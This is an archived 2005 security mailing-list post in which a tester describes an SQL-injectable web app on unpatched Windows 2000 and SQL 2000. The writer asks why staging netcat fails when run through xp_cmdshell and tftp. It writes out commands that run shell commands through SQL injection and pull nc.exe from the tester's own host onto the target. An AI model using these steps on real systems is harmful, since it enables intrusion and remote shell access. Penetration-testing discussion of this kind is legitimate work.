From: Andres Molinetti (andymolinetti@hotmail.com)
Date: Wed Jun 22 2005 - 18:24:08 EDT
Hi, I am testing a Web App vulnerable to SQL Injection.
It is hosted in a Windows 2000 SP4 and SQL 2000 with no patches.
While trying to use the xp_cmdshell to upload nc.exe from my tftpd server to
the Webserver, I experienced some problems.
I was able to execute xp_cmdshell 'echo a > c:\a.txt' . File is created.
As administrator (using a windows cmd.exe shell) I ran "tftp -i myHost GET
nc.exe c:\nc.exe". File is downloaded.
When I tried it through the wep app it failed. I tried directly through SQL
Query Analizer and it also failed.
SQL is running as a low priviledged account (sqlsvc)...
Then I ran (as Administrator) "runas /user:sqlsvc tftp -i myHost GET nc.exe
c:\nc.exe" and IT FAILED.!!
I can easily deduce that the problem is the TFTP client (tftp.exe)...
Any Ideas?
_________________________________________________________________
Moda para esta temporada. Ponte al día de todas las tendencias.
http://www.msn.es/Mujer/moda/default.asp
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:28 EDT